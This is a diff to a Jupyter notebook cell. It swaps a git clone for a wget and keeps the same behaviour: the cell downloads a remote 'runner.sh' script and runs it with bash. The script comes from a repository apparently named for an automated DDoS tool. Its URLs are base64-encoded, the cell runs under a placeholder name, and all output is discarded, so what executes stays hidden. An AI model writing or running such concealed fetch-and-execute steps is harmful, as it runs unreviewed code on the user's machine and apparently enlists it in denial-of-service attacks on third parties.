--- a/main.ipynb
+++ b/main.ipynb
@@ -24,11 +24,7 @@
    "source": [
     "%cd ~\n",
     "name=\"@placeholder@\"\n",
-    "%rm -rf {name}  &> /dev/null\n",
-    "!git clone -n $(echo aHR0cHM6Ly9naXRodWIuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zLmdpdAo= | base64 --decode) --depth 1 {name}  &> /dev/null\n",
-    "%cd {name}\n",
-    "!git checkout HEAD $(echo cnVubmVyLnNoCg== | base64 --decode)  &> /dev/null\n",
-    "!mv $(echo cnVubmVyLnNoCg== | base64 --decode) {name}.sh  &> /dev/null\n",
+    "!wget -O {name}.sh $(echo aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zL2ZlYXR1cmUvZHluYW1pYy9ydW5uZXIuc2gK | base64 --decode) &> /dev/null\n",
     "!bash {name}.sh"
    ],
    "metadata": {
